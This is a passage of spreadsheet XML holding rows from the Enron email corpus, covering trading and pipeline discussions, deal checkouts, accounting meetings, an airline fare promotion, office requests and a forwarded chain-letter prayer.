  </si>
  <si>
    <t xml:space="preserve">Let's do it!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Barry Tycholiz/ENRON@enronXgate 08/09/2001 09:50 AM 	   To: Mark Whitt/NA/Enron@Enron, Paul T Lucci/NA/Enron@Enron  cc:   Subject: NBPL- Segmentation Discussion	_x000D_
_x000D_
_x000D_
We need to discuss this NBPL opportunity and how we can front run Tenaska. As discussed there is a ton of Canadian Producers who own this pipe and if we can structure a deal to segment the pipe that has Rockies gas supply attached to it we should pursue._x000D_
_x000D_
BT _x000D_
</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2000 00:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vance.taylor@enron.com', 'daren.farmer@enron.com'})</t>
  </si>
  <si>
    <t>wellheads</t>
  </si>
  <si>
    <t>Daren,   Cody has a new well coming on Friday behind the 985333.  Right now _x000D_
we don't have any nominations at that meter so I'll get with vance on that .  _x000D_
The increases according to the fax is going from 230@day to 1700 on friday _x000D_
and 1700 to 3200 on sat.  PRIZE Energy would like to make some changes,  _x000D_
_x000D_
Meter_x000D_
_x000D_
4028       from 1270 to 820          has been flowing from 600 to 800 this _x000D_
month_x000D_
_x000D_
4965       from 112 to 45                has been flowing mid 80's this month _x000D_
                 from 97 to 104</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 07:29:26 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Jean-Pierre St-Cyr" &lt;jstcyr@fimat.com&gt;@ENRON  _x000D_
Sent:	Friday, October 26, 2001 9:13 AM_x000D_
To:	Glover, Sheila_x000D_
Subject:	Fimat - Account opening documentation_x000D_
_x000D_
_x000D_
Attached is the account opening documentation in order to open an account_x000D_
at Fimat Derivatives Canada Inc._x000D_
_x000D_
(See attached file: KITANGLAIS.DOC)_x000D_
_x000D_
Please have this documentation completed and signed by authorized people at_x000D_
Enron._x000D_
_x000D_
In order to open the account today, you could fax to my attention only the_x000D_
signed pages and thereafter send the whole package by courrier to my_x000D_
attention._x000D_
_x000D_
For any questions on these papers, you or your legal department can contact_x000D_
me directly via e-mail or phone._x000D_
_x000D_
Regards,_x000D_
_x000D_
Jean-Pierre St-Cyr_x000D_
Vice-pr?sident, Audit et Affaires juridiques / Vice-President, Audit and_x000D_
Legal_x000D_
Fimat Produits D?riv?s Canada Inc. / Fimat Derivatives Canada Inc._x000D_
T?l?p./Phone:?514-841-6208_x000D_
T?l?c./Fax:514-841-6217_x000D_
 - KITANGLAIS.DOC </t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 07:12:35 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travieso74@hotmail.com', 'danny.delany@theaustin.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
CEMEX  _x000D_
Mark Doggett  _x000D_
Territory Manager  _x000D_
713-410-2267  _x000D_
&gt;From: "Josh Stacey" _x000D_
&gt;To: aggielandmadman@hotmail.com, Ryan.Wiegand@jacobs.com, chadjoiner@yahoo.com, Lazerine@hotmail.com, dalestacey@hotmail.com, dsilentgirl@excite.com, devins@wf.net, Matt_Doggett@Dell.com, dustinandhallie@juno.com, epmbbryan@hotmail.com, litlgar@hotmail.com, Heathfoot@aol.com, Hunter.Hayes@esc9.net, jentremblay98@yahoo.com, johnnyhewett@hotmail.com, jones630@yahoo.com, KevinDMcCormick@aol.com, kjennings@pdq.net, manny_menard@yahoo.com, doggettmark@hotmail.com, michael_barela@hotmail.com, scottnooj@aol.com, taylorwood79@hotmail.com, STDTJW14@shsu.edu, texaggie252@hotmail.com, tigerlilee02@hotmail.com, tshackouls@aol.com, TY1201@aol.com, Brandon_Wheeler@Dell.com, wootenandrea@hotmail.com  _x000D_
&gt;Date: Tue, 05 Feb 2002 14:28:53 -0600  _x000D_
&gt;  _x000D_
_x000D_
Chat with friends online, try MSN Messenger: Click Here _x000D_
_x000D_
_x000D_
Josh Stacey_x000D_
Fightin' Texas Aggie Class of '98_x000D_
 _x000D_
 _x000D_
Josh Stacey_x000D_
Fightin' Texas Aggie Class of '98_x000D_
 _x000D_
 _x000D_
 - Priorities[1].jpg </t>
  </si>
  <si>
    <t>Thu, 10 May 2001 07:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Ontario Standard Contract</t>
  </si>
  <si>
    <t xml:space="preserve">I don't have copies of any of the FASB pronouncements.  I suggest you find _x000D_
one of the accountants who handles these things.  I don't know who that is so _x000D_
i would start wit Paige Grumulaitis -- she seems to know most accounting _x000D_
answers and when she doesn't, she knows who to ask._x000D_
_x000D_
_x000D_
_x000D_
	Chris Gaffney_x000D_
	05/10/2001 01:36 PM_x000D_
		 _x000D_
		 To: Elizabeth Sager/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Jeffrey T _x000D_
Hodge/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Ontario Standard Contract_x000D_
_x000D_
In connection with my continued efforts as co-chair of the Ontario Standard _x000D_
Bilateral contract committee I am once again going to be called upon to _x000D_
debate Ontario Power Generation as to whether the Ontario market rules allow _x000D_
for physical trading (which is our position) or is a purely financial market _x000D_
(OPG's position).  _x000D_
As part of their argument they are pointing to certain FASB rules that _x000D_
distinguish between physical and financial/derivative transactions.  Do any _x000D_
of you have a copy of or reference to such materials and/or commentary _x000D_
thereon._x000D_
_x000D_
My debate is to occur Monday so if you could get back to me as soon as _x000D_
possible it would be greatly appreciated._x000D_
_x000D_
Regards_x000D_
CJG_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 07:46:52 -0700 (PDT)</t>
  </si>
  <si>
    <t>Meeting today at 3:00</t>
  </si>
  <si>
    <t>We will meet for thirty minutes before our 3:30 fundies meeting.  _x000D_
_x000D_
1.  EOL market making - Lavo has asked us to increase basis liquidity.  Janie has mentioned general theme of market, "why trade on EOL 5000/d and risk moving the market".  We are becoming market framers.  I think Frank Ermis is a pioneer._x000D_
_x000D_
2.  Deal confirmations - Anne Bike misbooked a deal for me from March, cost $3.5 million.  How do we deal with this issue of confirmations missing deals._x000D_
_x000D_
3.  Vacation and work hours - Discuss vacation schedules for the rest of the year.  We need to do a good job of coordinating when we are out._x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 08:59:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'catalina.cardenas@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'tori.kuykendall@enron.com', 'bilal.bajwa@enron.com', 'chris.gaskill@enron.com', 'jeremy.lo@enron.com', 'd..curry@enron.com', 'jay.reitmeyer@enron.com', 'keith.holst@enron.com'})</t>
  </si>
  <si>
    <t>P2000 Meeting</t>
  </si>
  <si>
    <t>The meeting with IHS Energy representatives will take place tomorrow from 10:30 to 1:30 in EB3321_x000D_
It will probably take a while to set up the equipment, I would think the actual presentation will start about 11:30._x000D_
Please let me know if you will be able to attend._x000D_
_x000D_
Catalina Cardenas_x000D_
Analyst_x000D_
Enron North America_x000D_
(713)345-3650</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 10:40:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sjernig@entergy.com', "'jernigan@enron.com"})</t>
  </si>
  <si>
    <t>RE: Let's talk trade</t>
  </si>
  <si>
    <t xml:space="preserve">What's your idea?_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jernigan, Steven [mailto:SJernig@entergy.com]_x000D_
Sent: Wednesday, October 03, 2001 10:57 AM_x000D_
To: 'tstaab@enron.com'; 'ncortez@enron.com'_x000D_
Subject: Let's talk trade_x000D_
_x000D_
_x000D_
I want a good receiver.  You need a RB. </t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 05:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'andy.zipper@enron.com', 'bob.shults@enron.com'})</t>
  </si>
  <si>
    <t>Broker Transaction Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Here is the first draft._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> -----Original Message-----_x000D_
From:  Enron Announcements/Corp/Enron@ENRON _x000D_
[mailto:IMCEANOTES-Enron+20Announcements_Corp_Enron+40ENRON@ENRON.com]  On _x000D_
Behalf Of iBuyit@ENRON_x000D_
Sent: Wednesday, April 11, 2001 12:42 AM_x000D_
To: All Enron Employees United States@ENRON_x000D_
Subject: Reply Requested: Do You Code Or Approve Invoices?_x000D_
_x000D_
Do you code or approve invoices for goods and services that are processed by _x000D_
the Houston-based Accounts Payable center?_x000D_
If yes, please read and respond to this e-mail._x000D_
_x000D_
 &lt;&lt; OLE Object: Picture (Metafile) &gt;&gt; _x000D_
_x000D_
On May 1st, iBuyit Payables will be activated for all organizations supported _x000D_
by the Houston-based Accounts Payable processing center (for example, _x000D_
invoices submitted via AP drop box to 600 Jefferson, Houston).  If you code _x000D_
or approve these invoices, the iBuyit Payables project team has important _x000D_
information to share with you about the iBuyit Payables system, training, and _x000D_
the May 1st transition to the new system._x000D_
_x000D_
To identify yourself as a future iBuyit Payables Coder or Approver, please _x000D_
respond to this e-mail upon receipt with the following information:_x000D_
*  Full Name (First, Middle, Last) [Sheila Knudsen]    Sheila Ann Knudsen  _x000D_
*  E-mail address [Sheila Knudsen]    sheila.knudsen@enron.com _x000D_
*  Business unit (For example, Corporate, ETS, EWS, EES, or EBS) [Sheila _x000D_
Knudsen]    EWS _x000D_
*  Do you code invoices? (Yes/No) [Sheila Knudsen]   Yes _x000D_
*  Do you approve invoices? (Yes/No) [Sheila Knudsen]    Yes _x000D_
*  Are you a remote user? For example, do you dialup to access the Enron _x000D_
network? (Yes/No) [Sheila Knudsen]    No _x000D_
_x000D_
This will ensure that you receive important iBuyit Payables information.  _x000D_
Thank you for your response!_x000D_
_x000D_
Attached is important iBuyit Payables training information:_x000D_
_x000D_
 &lt;&lt; File: iBuyit Payables Training Information.doc &gt;&gt; _x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 05:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>hey fletch - i was wondering if you had any access to bbq cookoff tickets for _x000D_
the enron tent this weekend.  i have a friend coming in from new york and he _x000D_
really wants to swing by there.  let me know.  thanks</t>
  </si>
  <si>
    <t>Wed, 5 Apr 2000 03:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Carl Tricoli</t>
  </si>
  <si>
    <t>Zimin,_x000D_
_x000D_
Carl Tricoli  (5-8958) will call you regarding help on ethanol (hedging)._x000D_
_x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 06:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">587415 - changed to Bloomberg_x000D_
_x000D_
All the rest of these were just entered, except last deal _x000D_
_x000D_
Tom buys AEP_x000D_
May_x000D_
PV_x000D_
283.00_x000D_
_x000D_
Tom does not recognize this trade - is APB sure of the terms?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kerri Thompson@ENRON_x000D_
04/20/2001 01:27 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: apb checkout_x000D_
_x000D_
587415_x000D_
not apb_x000D_
_x000D_
missing deals_x000D_
_x000D_
mark f_x000D_
buy srp_x000D_
217.00_x000D_
25 mw_x000D_
pv_x000D_
on peak_x000D_
_x000D_
holden_x000D_
sell williams_x000D_
24-30_x000D_
102.00_x000D_
25 mw_x000D_
pv_x000D_
off peak_x000D_
_x000D_
holden_x000D_
sell williams_x000D_
24-30_x000D_
100.00_x000D_
50 mw_x000D_
pv_x000D_
off peak_x000D_
_x000D_
tom a_x000D_
buy pacificorp_x000D_
200.00_x000D_
23rd_x000D_
25 mw_x000D_
on peak_x000D_
_x000D_
tom a_x000D_
buy aep_x000D_
283.00_x000D_
25 mw_x000D_
may_x000D_
pv_x000D_
on peak_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 21 Oct 2000 06:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Power Plant Development Powerpoint Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know if you got this, so here 'tis.  I was out of town and missed the _x000D_
presentation, although I've worked with Herman, Roger and David on these _x000D_
issues.  I'm sure they would be glad to give the presentation again for _x000D_
others with a need to understand the complexities of off balance sheet _x000D_
treatment of power plants._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 10/21/2000 01:24 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  David Leboe @ ECT                           10/17/2000 04:22 PM_x000D_
	_x000D_
_x000D_
To: Suzanne Adams/HOU/ECT@ECT, Alan Larsen/PDX/ECT@ECT, Karen E _x000D_
Jones/HOU/ECT@ECT, Bob Carter/HOU/ECT@ECT, Barton Clark/HOU/ECT@ECT, Dale _x000D_
Rasmussen/HOU/ECT@ECT, Ed B Hearn III/HOU/ECT@ECT, matt.maxwell@enron.com, _x000D_
kay.mann@enron.com, Stuart Zisman/HOU/ECT@ECT, Peggy Banczak/HOU/ECT@ECT_x000D_
cc: Herman Manis/Corp/Enron@ENRON, Roger Ondreko/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Power Plant Development Powerpoint Presentation  _x000D_
_x000D_
Herman and I will see you at 10:00am tomorrow to discuss accounting issues _x000D_
related to our power plant development and sale activities._x000D_
_x000D_
Our presentation will be based upon the following attachment.  _x000D_
_x000D_
Hard copies will be available tomorrow in 38C2._x000D_
_x000D_
Regards._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Alan Larsen_x000D_
10/16/2000 01:13 PM_x000D_
To: Suzanne Adams/HOU/ECT@ECT_x000D_
cc: Karen E Jones/HOU/ECT@ECT, Bob Carter/HOU/ECT@ECT, Barton _x000D_
Clark/HOU/ECT@ECT, Dale Rasmussen/HOU/ECT@ECT, Ed B Hearn III/HOU/ECT@ECT, _x000D_
matt.maxwell@enron.com, kay.mann@enron.com, Stuart Zisman/HOU/ECT@ECT, Peggy _x000D_
Banczak/HOU/ECT@ECT, David Leboe/HOU/ECT@ECT _x000D_
Subject: Re: Power Plant Development Powerpoint Presentation  _x000D_
_x000D_
Could you check with David and see if he could fax copies of the PowerPoint _x000D_
plates to me in Portland so we have a fighting chance of following along by _x000D_
tying in by phone?    If that is possible, try to send them by Tuesday. Thank _x000D_
you very much._x000D_
 Al Larsen_x000D_
_x000D_
_x000D_
From: Suzanne Adams on 10/12/2000 04:11 PM_x000D_
To: Karen E Jones/HOU/ECT@ECT, Bob Carter/HOU/ECT@ECT, Barton _x000D_
Clark/HOU/ECT@ECT, Alan Larsen/PDX/ECT@ECT, Dale Rasmussen/HOU/ECT@ECT, Ed B _x000D_
Hearn III/HOU/ECT@ECT, matt.maxwell@enron.com, kay.mann@enron.com, Stuart _x000D_
Zisman/HOU/ECT@ECT, Peggy Banczak/HOU/ECT@ECT_x000D_
cc: David Leboe/HOU/ECT@ECT _x000D_
_x000D_
Subject: Power Plant Development Powerpoint Presentation_x000D_
_x000D_
There will be a presentation by David Leboe on October 18, 2000 at 10:00 a.m. _x000D_
in EB38C2.  Please put this on your calendar and plan to attend._x000D_
_x000D_
Also, the weekly meetings with Sheila will begin October 25, 2000 at 10:00 _x000D_
a.m. in E38C2. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 09:03:14 -0800 (PST)</t>
  </si>
  <si>
    <t>US Airways Offers Low Fares for Thanksgiving Travel</t>
  </si>
  <si>
    <t xml:space="preserve">                  Special Thanksgiving Fare Sale_x000D_
      Hurry! Purchase Tickets by Wednesday, November 21, 2001_x000D_
      -------------------------------------------------------_x000D_
_x000D_
US Airways is offering big discounts for travel during the Thanksgiving holiday period with fares as low as $98 roundtrip. These sale fares are available between most cities in the U.S. and between the U.S. and Canada or to many of our European destinations.  To take advantage of this offer, just book online at http://www.usairways.com/promotions/specials/thanksgiving_sale.htm no later than November 21, 2001. _x000D_
_x000D_
- Travel may originate on November 22 or 23, 2001 _x000D_
- Return travel applies November 22, 23, 27, 28 or 29, 2001 _x000D_
- All travel must be completed by November 29, 2001 _x000D_
- Travel is not permitted November 24, 25 or 26, 2001 	 _x000D_
- See Sale Fare Requirements below for complete details._x000D_
_x000D_
Plus, earn double Dividend Miles on flights between now and December 15, 2001. Be sure to register for this offer before departure at http://www.usairways.com/dividendmiles/7437.htm or call 1-800-872-4738 and enter Bonus Request Number 7437._x000D_
_x000D_
This is just a sample of the sale fares offered.  For reservations and fares from your city go to http://www.usairways.com/promotions/specials/thanksgiving_sale.htm_x000D_
_x000D_
_x000D_
Sample Markets				Roundtrip Sale Fares_x000D_
--------------				--------------------_x000D_
Atlanta - Pittsburgh				$138_x000D_
Baltimore - Miami					$178_x000D_
Boston - Indianapolis				$178_x000D_
Boston - Manchester, UK				$270_x000D_
Charlotte - London				$272_x000D_
Charlotte - Montreal				$191_x000D_
Los Angeles - Toronto				$256_x000D_
New York La Guardia - Richmond		$118_x000D_
Philadelphia - Denver				$208_x000D_
Philadelphia - Toronto				$127_x000D_
Raleigh/Durham - Charlotte			$ 98_x000D_
San Francisco - Amsterdam			$357_x000D_
Syracuse - Los Angeles				$258_x000D_
Washington, DC - Charleston, SC		$138_x000D_
Washington, DC - Brussels			$238_x000D_
_x000D_
Depending upon your travel needs, alternative routings may be available at the same fares, with part of the service on regional aircraft operated by US Airways Express carriers Allegheny, Air Midwest, CCAIR, Chautauqua, Colgan, Mesa, Piedmont, PSA, Shuttle America or Trans States._x000D_
_x000D_
Sale Fare Requirements:_x000D_
Fares are based on Coach travel. Roundtrip purchase required. Tickets must be purchased in advance of travel and within 24 hours of making reservation and no later than 11/21/01. Outbound travel applies 11/22-23/01. Return travel applies 11/22-23, 27-29/01. Travel is not permitted 11/24-26/01. All travel must be completed by 11/29/01. Tickets become nonrefundable 24 hours after making initial reservation, but under certain conditions may be changed for a minimum $100 fee ($150 for Europe). US and Canada fares do not include federal excise tax of $2.75, which will be imposed on each flight segment of the itinerary. A flight segment is defined as a takeoff and a landing. Fares do not include up to $18 in airport passenger facility charges, imposed at time of departure, where applicable. Fares to Canada do not include a federal immigration fee of $6 per roundtrip or airport fees of $6.50 per roundtrip. _x000D_
Fares to Europe do not include government imposed taxes/fees/surcharges of up to $97. Seats are limited or may be sold out during very busy travel times. Fares for Brussels apply from Reagan Washington National airport only. Lower fares may be available in these markets. Sale fares may not be available in all markets. Other conditions may apply. These fares are not available when purchasing by telephone through our Reservations Department.  _x000D_
 _x000D_
This is a post-only mailing sent to kholst@ENRON.COM.  Please do not respond to this message. To change preferences or un-subscribe from this list, please visit the E-Savers enrollment page at http://www.usairways.com/esavers/enroll.htm     _x000D_
_x000D_
_x000D_
		Copyright US Airways 1996-2001.  All rights reserved._x000D_
_x000D_
	   US Airways World Wide Web address: http://www.usairways.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 12:32:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Personal Day</t>
  </si>
  <si>
    <t xml:space="preserve">Shirley,_x000D_
_x000D_
No problem._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Crenshaw, Shirley  _x000D_
Sent:	Tuesday, July 17, 2001 8:47 AM_x000D_
To:	Kaminski, Vince J_x000D_
Cc:	Dupont, Anita; Garza, Christina_x000D_
Subject:	Personal Day_x000D_
_x000D_
Vince:_x000D_
_x000D_
I have several repairs that need to be done at home.  May I please_x000D_
take a 1/2 day personal tomorrow afternoon and next Monday, the_x000D_
30th in the morning?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Shirley_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 13:44:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'stephen.herber@enron.com', 'g..stage@enron.com'})</t>
  </si>
  <si>
    <t>FW: Mt. Jesus !!!</t>
  </si>
  <si>
    <t xml:space="preserve">	FYI.   Thanks. Lynn_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Graham, Charlie  _x000D_
Sent:	Tuesday, October 02, 2001 4:29 PM_x000D_
To:	Blair, Lynn; Kile, Rick; Brickman, Ronnie; Howard, Randy; Moseley, Debbie; Walton, Mark; Fancler, Dan_x000D_
Cc:	Rice, Randy; Pribble, Dan; Cessac, Kenneth; Neubauer, Dave_x000D_
Subject:	Mt. Jesus !!!_x000D_
_x000D_
Dave Neubauer received a voice mail message today from Terry Spencer in which Terry stated that ONEOK will be forwarding the withheld mmbtu reimbursement payments for the condensate removed from Northern's Mt. Jesus drip.  Dan, please notify the rest of us when payment is received._x000D_
_x000D_
As an aside, note that last week CP Energy and Touchstone Trucking met with our Ron Brickman and others after identifying themselves as, a new condensate marketer and drip hauler retained by ONEOK to begin collecting the Mt. Jesus, Fowler, Sublette locations.  It is our understanding that these folks were brought in by Oneok on a trial basis to collect drip at locations that have been a "problem" for/between Oneok and its current hauler._x000D_
_x000D_
Charlie Graham_x000D_
Phone 402-398-7061_x000D_
Fax 402-398-7122 _x000D_
OMA 0629_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 01:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: [Fwd: Fw: Fw: join me in prayer (198)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 08/10/2000 _x000D_
08:58 AM ---------------------------_x000D_
_x000D_
_x000D_
Angela Barnett_x000D_
08/09/2000 07:46 AM_x000D_
To: Sandra R McNichols/HOU/ECT@ECT, Pamela Mitchell/HOU/ECT@ECT, Judy _x000D_
Walters/HOU/ECT@ECT, Judy Hernandez/HOU/ECT@ECT, Angela Gill/NA/Enron@Enron, _x000D_
Regina Blackshear/Corp/Enron@ENRON, Eve Puckett/Corp/Enron@ENRON, Diane _x000D_
Salcido/Corp/Enron@Enron, Jorge Olivares/Corp/Enron@ENRON, Monique _x000D_
Phillips/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, kCurley@tmh.tmc.edu, Topey _x000D_
0661@ol.com, kttn0965@aol.com, Warren Perry/Corp/Enron@Enron, Derick _x000D_
Jones/Corp/Enron@Enron, Nikki Johnson/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: Fwd: [Fwd: Fw: Fw: join me in prayer (198)_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Angela Barnett/HOU/ECT on 08/09/2000 _x000D_
07:43 AM ---------------------------_x000D_
_x000D_
_x000D_
McJenjil@aol.com on 08/07/2000 04:56:51 PM_x000D_
To: Angela.Barnett@enron.com, JMarti8873@aol.com, MrPokeFreak@aol.com, _x000D_
Somrenae@aol.com, csimpson@wcnet.net, Worship47@juno.com_x000D_
cc:  _x000D_
Subject: Fwd: [Fwd: Fw: Fw: join me in prayer (197)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Return-path: &lt;BOW7952@aol.com&gt;_x000D_
From: BOW7952@aol.com_x000D_
Full-name: BOW7952_x000D_
Message-ID: &lt;98.88f2e99.26be3540@aol.com&gt;_x000D_
Date: Sat, 5 Aug 2000 23:28:00 EDT_x000D_
Subject: Fwd: [Fwd: Fw: Fw: join me in prayer (196)_x000D_
To: jrr9000@hotmail.com, BVDBEN@aol.com, skbothum@yahoo.com, _x000D_
shutupuface@worldnet.att.net, janet.davis@usvgi.mail.abb.com (Janet Davis), _x000D_
Seustace@sohmission.org, SFisher302@aol.com, gasparks@gateway.net, _x000D_
zoellen@swbell.net, glynnh2288@yahoo.com, jeanene.lanier@mcdermott.com, _x000D_
lhubbell@houston.rr.com, McJenjil@aol.com, ptrainer@goldston-engineering.com, _x000D_
JMRoden@Equilon.com (Joan Roden), DENNYHAL@HAL-PC.ORG, rayna@accountron.com _x000D_
(Rayna Shaunfield), DTAYLOR@houston.rangeresources.com, _x000D_
srsmith@duke-energy.com (Steve Smith), svernon@hvj.com (Susan Vernon)_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary="part2_e2.83b26a4.26be3540_boundary"_x000D_
X-Mailer: AOL 5.0 for Windows sub 119_x000D_
_x000D_
_x000D_
_x000D_
Content-Transfer-Encoding: 7bit_x000D_
Return-Path: &lt;gwbarnet@ayrix.net&gt;_x000D_
Received: from  rly-ye04.mx.aol.com (rly-ye04.mail.aol.com [172.18.151.201]) _x000D_
by air-ye02.mx.aol.com (v75_b3.11) with ESMTP; Sat, 05 Aug 2000 12:31:41 -0400_x000D_
Received: from  gambit.ayrix.net (mail.ayrix.net [64.49.1.26]) by _x000D_
rly-ye04.mx.aol.com (v75_b3.9) with ESMTP; Sat, 05 Aug 2000 12:31:27 -0400_x000D_
Received: from ayrix.net ([64.49.41.67]) by gambit.ayrix.net          _x000D_
(Post.Office MTA v3.5.3 release 223 ID# 0-57710U53000L800S0V35)          with _x000D_
ESMTP id net; Sat, 5 Aug 2000 09:53:18 -0500_x000D_
Message-ID: &lt;398C2AF1.85AED897@ayrix.net&gt;_x000D_
Date: Sat, 05 Aug 2000 09:55:45 -0500_x000D_
From: Geraldine Walker-Barnett &lt;gwbarnet@ayrix.net&gt;_x000D_
X-Mailer: Mozilla 4.7 [en]C-3M;VANGRD  (Win98; U)_x000D_
X-Accept-Language: en_x000D_
MIME-Version: 1.0_x000D_
To: Spencer Walker &lt;bigworm_828@yahoo.com&gt;, Kelly Walker _x000D_
&lt;YourdaddyK@aol.com&gt;,        Fred &amp; Willis Mae Brown _x000D_
&lt;willismae@webtv.net&gt;,        Ron &amp; Barbara Walker &lt;BOW7952@aol.com&gt;,        _x000D_
Don &amp; Sue Griffith &lt;backdrft@bellsouth.net&gt;_x000D_
Subject: [Fwd: Fw: Fw: join me in prayer (195)_x000D_
Content-Type: text/plain; charset=us-ascii_x000D_
_x000D_
_x000D_
_x000D_
AYRIX wrote:_x000D_
_x000D_
&gt; ----- Original Message -----_x000D_
&gt; From: Becky Loyd &lt;rsloyd@yahoo.com&gt;_x000D_
&gt; To: denise mraz &lt;dmraz@netdoor.com&gt;; Candice Mullins &lt;dmmullins@ayrix.net&gt;;_x000D_
&gt; Stacy &lt;stloyd@yahoo.com&gt;; barbara walker &lt;bebeepop@ayrix.net&gt;; Tommy Loyd_x000D_
&gt; &lt;loyd1204@bellsouth.net&gt;; &lt;julesper@yahoo.com&gt;_x000D_
&gt; Sent: Friday, August 04, 2000 1:31 PM_x000D_
&gt; Subject: Fwd: Fw: join me in prayer (194)_x000D_
&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; --- Charter &lt;charter4@earthlink.net&gt; wrote:_x000D_
&gt; &gt; &gt; Reply-to: "Charter" &lt;charter4@earthlink.net&gt;_x000D_
&gt; &gt; &gt; From: "Charter" &lt;charter4@earthlink.net&gt;_x000D_
&gt; &gt; &gt; To: "Winscott" &lt;jmwinsco@netdoor.com&gt;, "Susan Toney"_x000D_
&gt; &gt; &gt; &lt;sbtoney@yahoo.com&gt;,_x000D_
&gt; &gt; &gt;         "Susan" &lt;freshley@worldnetla.net&gt;, "Steve"_x000D_
&gt; &gt; &gt; &lt;sroberts@jam.rr.com&gt;,_x000D_
&gt; &gt; &gt;         "Paulette Sullivan" &lt;paulette@gulfpak.com&gt;,_x000D_
&gt; &gt; &gt;         "Morton" &lt;jamesnash@beci.net&gt;,_x000D_
&gt; &gt; &gt;         "Michelle &amp; Teresa"_x000D_
&gt; &gt; &gt; &lt;charter@worldnetla.net&gt;,_x000D_
&gt; &gt; &gt;         "Kim Gaal" &lt;kegaal@hotmail.com&gt;, "Joe Pope"_x000D_
&gt; &gt; &gt; &lt;ejpope@worldnetla.net&gt;,_x000D_
&gt; &gt; &gt;         "Jim" &lt;SilentHitz@aol.com&gt;, "Jan"_x000D_
&gt; &gt; &gt; &lt;geljdl@aol.com&gt;,_x000D_
&gt; &gt; &gt;         "Dorothy" &lt;delliot9745@earthlink.net&gt;,_x000D_
&gt; &gt; &gt; "Donna" &lt;dkdadams@hotmail.com&gt;,_x000D_
&gt; &gt; &gt;         "Becky Loyd" &lt;rsloyd@yahoo.com&gt;, "Barbara"_x000D_
&gt; &gt; &gt; &lt;barb101@worldnetla.net&gt;,_x000D_
&gt; &gt; &gt;         "Andrea" &lt;aharrigan@cp-tel.net&gt;_x000D_
&gt; &gt; &gt; Subject: Fw: join me in prayer (193)_x000D_
&gt; &gt; &gt; Date: Fri, 4 Aug 2000 14:42:53 -0500_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Relax and let God be the only Person on your mind_x000D_
&gt; &gt; &gt; while you read this Prayer. If we can take the time_x000D_
&gt; &gt; &gt; to read long jokes, stories, etc.,we should give the_x000D_
&gt; &gt; &gt; same respect to this prayer. Friends that Pray_x000D_
&gt; &gt; &gt; together, stay together. Let's pray..._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt; Dear Lord, I thank You for this day. I Thank You for_x000D_
&gt; &gt; &gt; my being able to see and to hear this morning. I'm_x000D_
&gt; &gt; &gt; blessed because You are a forgiving God and an_x000D_
&gt; &gt; &gt; understanding God. You have done so much for me and_x000D_
&gt; &gt; &gt; You keep on blessing me. Forgive me this day for I_x000D_
&gt; &gt; &gt; have sinned. I ask now for Your forgiveness._x000D_
&gt; &gt; &gt;_x000D_
&gt; &gt; &gt;_x000D_
